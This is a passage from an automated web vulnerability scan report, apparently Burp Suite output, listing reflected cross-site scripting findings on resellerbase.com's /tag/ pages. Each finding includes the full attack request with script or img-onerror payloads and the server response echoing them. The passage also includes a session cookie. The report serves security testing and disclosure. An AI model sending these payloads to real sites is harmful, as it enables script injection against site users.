<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagad629<script>alert(1)</script>e95c0cc8a8d/broadband was not found on this server.</p>
...[SNIP]...

2.4196. http://www.resellerbase.com/tag/broadband [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/broadband

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ca2ac<script>alert(1)</script>01fb17ac57451c4e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagca2ac<script>alert(1)</script>01fb17ac57451c4e3/broadband?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/broadband
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:56:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagca2ac<script>alert(1)</script>01fb17ac57451c4e3/broadband?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4197. http://www.resellerbase.com/tag/broadband [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/broadband

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1170<img%20src%3da%20onerror%3dalert(1)>c92f234f10a8f8be4 was submitted in the REST URL parameter 2. This input was echoed as b1170<img src=a onerror=alert(1)>c92f234f10a8f8be4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/broadbandb1170<img%20src%3da%20onerror%3dalert(1)>c92f234f10a8f8be4?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/broadband
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: broad
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : broadbandb1170<img src=a onerror=alert(1)>c92f234f10a8f8be4]</td>
...[SNIP]...

2.4198. http://www.resellerbase.com/tag/broadband [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/broadband

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4dfea<img%20src%3da%20onerror%3dalert(1)>0dc63de63ca was submitted in the REST URL parameter 2. This input was echoed as 4dfea<img src=a onerror=alert(1)>0dc63de63ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/broadband4dfea<img%20src%3da%20onerror%3dalert(1)>0dc63de63ca HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: broad
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : broadband4dfea<img src=a onerror=alert(1)>0dc63de63ca]</td>
...[SNIP]...

2.4199. http://www.resellerbase.com/tag/broadband [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/broadband

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 77fd0</title><img%20src%3da%20onerror%3dalert(1)>f0eabf14d20 was submitted in the REST URL parameter 2. This input was echoed as 77fd0</title><img src=a onerror=alert(1)>f0eabf14d20 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/broadband77fd0</title><img%20src%3da%20onerror%3dalert(1)>f0eabf14d20 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:55:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: broadband77fd0</title><img src=a onerror=alert(1)>f0eabf14d20</title>
...[SNIP]...

2.4200. http://www.resellerbase.com/tag/broadband [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/broadband

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload b5495</title><img%20src%3da%20onerror%3dalert(1)>e0f28f4e6e41577c9 was submitted in the REST URL parameter 2. This input was echoed as b5495</title><img src=a onerror=alert(1)>e0f28f4e6e41577c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/broadbandb5495</title><img%20src%3da%20onerror%3dalert(1)>e0f28f4e6e41577c9?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/broadband
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:56:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9824

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: broadbandb5495</title><img src=a onerror=alert(1)>e0f28f4e6e41577c9</title>
...[SNIP]...

2.4201. http://www.resellerbase.com/tag/cam [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ddcc0<script>alert(1)</script>492aa202f76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tagddcc0<script>alert(1)</script>492aa202f76/cam HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagddcc0<script>alert(1)</script>492aa202f76/cam was not found on this server.</p>
...[SNIP]...

2.4202. http://www.resellerbase.com/tag/cam [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cam

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d708f<script>alert(1)</script>1e2c38309fc844e6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tagd708f<script>alert(1)</script>1e2c38309fc844e6f/cam?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:59:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tagd708f<script>alert(1)</script>1e2c38309fc844e6f/cam?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4203. http://www.resellerbase.com/tag/cam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 171e7</title><img%20src%3da%20onerror%3dalert(1)>7a91239444c456c6a was submitted in the REST URL parameter 2. This input was echoed as 171e7</title><img src=a onerror=alert(1)>7a91239444c456c6a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/cam171e7</title><img%20src%3da%20onerror%3dalert(1)>7a91239444c456c6a?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9812

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cam171e7</title><img src=a onerror=alert(1)>7a91239444c456c6a</title>
...[SNIP]...

2.4204. http://www.resellerbase.com/tag/cam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eefdd<img%20src%3da%20onerror%3dalert(1)>78cff4e21bb5b040b was submitted in the REST URL parameter 2. This input was echoed as eefdd<img src=a onerror=alert(1)>78cff4e21bb5b040b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag/cameefdd<img%20src%3da%20onerror%3dalert(1)>78cff4e21bb5b040b?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cam
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:59:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9796

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: camee
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : cameefdd<img src=a onerror=alert(1)>78cff4e21bb5b040b]</td>
...[SNIP]...

2.4205. http://www.resellerbase.com/tag/cam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload 23b25</title><img%20src%3da%20onerror%3dalert(1)>2e9c7ba787b was submitted in the REST URL parameter 2. This input was echoed as 23b25</title><img src=a onerror=alert(1)>2e9c7ba787b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/cam23b25</title><img%20src%3da%20onerror%3dalert(1)>2e9c7ba787b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cam23b25</title><img src=a onerror=alert(1)>2e9c7ba787b</title>
...[SNIP]...

2.4206. http://www.resellerbase.com/tag/cam [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cam

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8460d<img%20src%3da%20onerror%3dalert(1)>00c271334fd was submitted in the REST URL parameter 2. This input was echoed as 8460d<img src=a onerror=alert(1)>00c271334fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/cam8460d<img%20src%3da%20onerror%3dalert(1)>00c271334fd HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:58:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9784

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cam84
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : cam8460d<img src=a onerror=alert(1)>00c271334fd]</td>
...[SNIP]...

2.4207. http://www.resellerbase.com/tag/cams [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cams

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4c459<script>alert(1)</script>967f8a74a30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag4c459<script>alert(1)</script>967f8a74a30/cams HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:55:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag4c459<script>alert(1)</script>967f8a74a30/cams was not found on this server.</p>
...[SNIP]...

2.4208. http://www.resellerbase.com/tag/cams [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cams

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload f0a2b</title><img%20src%3da%20onerror%3dalert(1)>3d80a16e4e6 was submitted in the REST URL parameter 2. This input was echoed as f0a2b</title><img src=a onerror=alert(1)>3d80a16e4e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/camsf0a2b</title><img%20src%3da%20onerror%3dalert(1)>3d80a16e4e6 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: camsf0a2b</title><img src=a onerror=alert(1)>3d80a16e4e6</title>
...[SNIP]...

2.4209. http://www.resellerbase.com/tag/cams [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cams

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 75672<img%20src%3da%20onerror%3dalert(1)>9fd8087c73b was submitted in the REST URL parameter 2. This input was echoed as 75672<img src=a onerror=alert(1)>9fd8087c73b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/cams75672<img%20src%3da%20onerror%3dalert(1)>9fd8087c73b HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:56:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cams7
...[SNIP]...
<td height="24" colspan="2" class="tbl_caption"> Web Links [Tag : cams75672<img src=a onerror=alert(1)>9fd8087c73b]</td>
...[SNIP]...

2.4210. http://www.resellerbase.com/tag/cellular [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cellular

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 53bc0<script>alert(1)</script>a348a8cbaa332323 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /tag53bc0<script>alert(1)</script>a348a8cbaa332323/cellular?sort_by=title&sort_order=asc HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/tag/cellular
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:58:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag53bc0<script>alert(1)</script>a348a8cbaa332323/cellular?sort_by=title&sort_order=asc was not found on this server.</p>
...[SNIP]...

2.4211. http://www.resellerbase.com/tag/cellular [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cellular

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f4f6<script>alert(1)</script>f241e83a3ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tag8f4f6<script>alert(1)</script>f241e83a3ee/cellular HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:57:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /tag8f4f6<script>alert(1)</script>f241e83a3ee/cellular was not found on this server.</p>
...[SNIP]...

2.4212. http://www.resellerbase.com/tag/cellular [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cellular

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload abd9a</title><img%20src%3da%20onerror%3dalert(1)>403bb3f6bb4 was submitted in the REST URL parameter 2. This input was echoed as abd9a</title><img src=a onerror=alert(1)>403bb3f6bb4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /tag/cellularabd9a</title><img%20src%3da%20onerror%3dalert(1)>403bb3f6bb4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:57:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9810

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Browse by Tag: cellularabd9a</title><img src=a onerror=alert(1)>403bb3f6bb4</title>
...[SNIP]...

2.4213. http://www.resellerbase.com/tag/cellular [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /tag/cellular

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as text between TITLE tags. The payload e5cd6</title><img%20src%3da%20onerror%3dalert(1)>7ffe369e170294cd0 was submitted in the REST URL parameter 2. This input was echoed as e5cd6</title><img src=a onerror=alert(1)>7ffe369e170294cd0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

